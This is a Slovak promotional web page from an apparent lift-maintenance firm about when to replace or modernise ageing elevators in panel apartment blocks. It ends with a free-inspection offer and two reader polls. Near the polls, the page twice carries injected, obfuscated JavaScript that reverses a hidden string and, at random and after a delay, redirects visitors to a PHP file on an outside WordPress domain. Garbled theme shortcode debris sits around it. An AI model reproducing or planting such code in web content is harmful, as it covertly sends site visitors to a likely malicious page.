Kedy je najvyšší čas na výmenu výťahu v paneláku?

Odpoveď úzko súvisí práve so životnosťou. Obrovské množstvo pôvodných výťahov v paneláku je starších viac ako 30 rokovto je najvyšší čas na výmenu najmä z hľadiska bezpečnosti, komfortu prepravy i estetiky vášho výťahu. V panelových domoch sa riešia rôzne opravy, zateplenia a výmeny, ale na výťah sa zabúda….Chcete vedieť v čom sa vozíte? Pýtajte sa vášho správcu – kedy bola vykonaná posledná odborná skúška alebo posledná opakovaná úradná skúška? S akým výsledkom? Nepodceňujte to, aby nebolo neskoro.

Výrobca pôvodných výťahov predpokladal životnosť výťahov na 30 rokov za predpokladu, že boli uskutočnené 2 stredné opravy a 1 generálna oprava. Samozrejme nestačí len vykonať generálku ale dôkladne odstrániť všetky zistené poruchy. Ak sa však zistí, že rozsah poruchy je v rozpore s bezpečnosťou a životnosť výťahu skončila, treba výťah čo najskôr MENIŤ alebo MODERNIZOVAŤ. Prečo nestačí len oprava? Kto dohliadne na to či sa výťah vymenil? Aj na tieto skutočnosti sa veľmi často zabúda. Kto nesie zodpovednosť ak dôjde k úrazu počas prevádzky? Správca bytovej jednotky či prevádzkovateľ výťahov? Spýtajte sa nás, radi poskytneme odborné poradenstvo.

ŽIVOTNOSŤ samozrejme závisí aj od kvality servisu samotného výťahu a poskytovateľov týchto služieb. Nekvalitnou údržbou sa môže aj ten najlepší výťah dohnať rýchlo do havarijného stavu. Preto neznamená, že vám nový výťah vydrží ďaľších 30 rokov bez dobrej údržby. Chcete mať o váš výťah dobre postarané? Spýtajte sa nás, ako to robíme my.

Snažíme sa komplikáciám predchádzať a dbáme, aby po výmene výťahu boli zabezpečené aj kvalitné servisné služby. Naši zmluvní zákazníci majú garanciu kvalitnej a pravidelnej údržby a naviac aj 24 hod. servis na telefón „otvorenie zaseknutého výťahu“ t.j. vyprošťovanie z výťahu.

Ak ste správca bytovej jednotky a aj vy sa trápite otázkou životnosti vášho výťahu, kedy ho vymeniť alebo či ho stačí „len opraviť“ – skontaktujte nás. Obhliadka vášho výťahu a vypracovanie posudku pre správcov z Bratislavy zdarma.

Akcia plati od 1.7.2015 – 1.9.2015

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_border=’av-border-thin‘ custom_width=’50px‘ custom_border_color=“ custom_margin_top=’30px‘ custom_margin_bottom=’30px‘ icon_select=’yes‘ custom_icon_color=“ icon=’ue808′ font=’entypo-fontello‘ av_uid=’av-4kno3r‘]

Loading

Spýtali by ste sa na prevádzkové normy pred spustením vášho nového výťahu?

Ďakujeme za Váš hlas
Už ste hlasovali v tomto hlasovaní!
Vyberte možnosť

  ) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_border=’av-border-thin‘ custom_width=’50px‘ custom_border_color=“ custom_margin_top=’30px‘ custom_margin_bottom=’30px‘ icon_select=’yes‘ custom_icon_color=“ icon=’ue808′ font=’entypo-fontello‘ av_uid=’av-36m6pj‘]

  Loading

  Dá sa ušetriť na servisných službách po modernizácii?

  Ďakujeme za Váš hlas
  Už ste hlasovali v tomto hlasovaní!
  Vyberte možnosť